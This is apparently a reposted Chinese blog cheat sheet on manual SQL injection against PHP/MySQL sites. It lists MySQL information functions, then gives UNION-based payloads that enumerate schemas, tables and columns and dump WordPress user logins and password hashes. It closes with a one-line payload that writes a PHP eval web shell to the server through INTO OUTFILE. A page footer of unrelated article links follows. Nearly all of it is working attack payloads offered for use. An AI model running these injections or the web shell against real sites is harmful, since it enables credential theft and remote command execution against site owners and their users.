php手工注入笔记-白红宇

php手工注入笔记

阅读量：6928 次

发布时间：2019-06-27

本文共 1096 字，大约阅读时间需要 3 分钟。

PHP内置函数：

1:system_user() 系统用户名

2:user() 用户名

3:current_user 当前用户名

4:session_user()连接数据库的用户名

5:database() 数据库名

6:version() MYSQL数据库版本

7:load_file() MYSQL读取本地文件的函数

8:@@datadir 读取数据库路径

9:@@basedir MYSQL 安装路径

10:@@version_compile_os 操作系统

===========================================================================

爆信息：

and 1=2 union select group_concat(user(),0x7c,database(),0x7c,version())--

============================================================================

1,爆库

and 1=2 union select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA --

2,爆表

and 1=2 union select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x776f72647072657373--

3,爆字段

and 1=2 union select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_name=0x77705f7573657273--

4,爆密码

and 1=2 union select group_concat(user_login,0x7c,user_pass) from wordpress.wp_users--

=============================================================================

load_file()

select ‘<?php eval_r($_POST[cmd])?>' into outfile '物理路径'

原文链接：

转载于:https://my.oschina.net/changpinghu/blog/92594

你可能感兴趣的文章

Sybase ASE12.5重建存在用户库的master（master库异常，尝试其他方法不能正常启动服务后）...

Win2012R2 x64 安装MySQL5.7.14压缩版

查看>>

EasyUI DataGrid 异常com.fasterxml.jackson.databind.JsonMappingException

查看>>

【码云周刊第 70 期】5个精致的 CSS 框架，你都知道么？

查看>>

ProxmoxVE 之集群安装(V5.2)

在Centos上安装使用GlusterFS

查看>>

小白学Docker（1）- 从0开始

查看>>

【JavaScript】详解HTML DOM

查看>>

JS投毒的另一种尝试

查看>>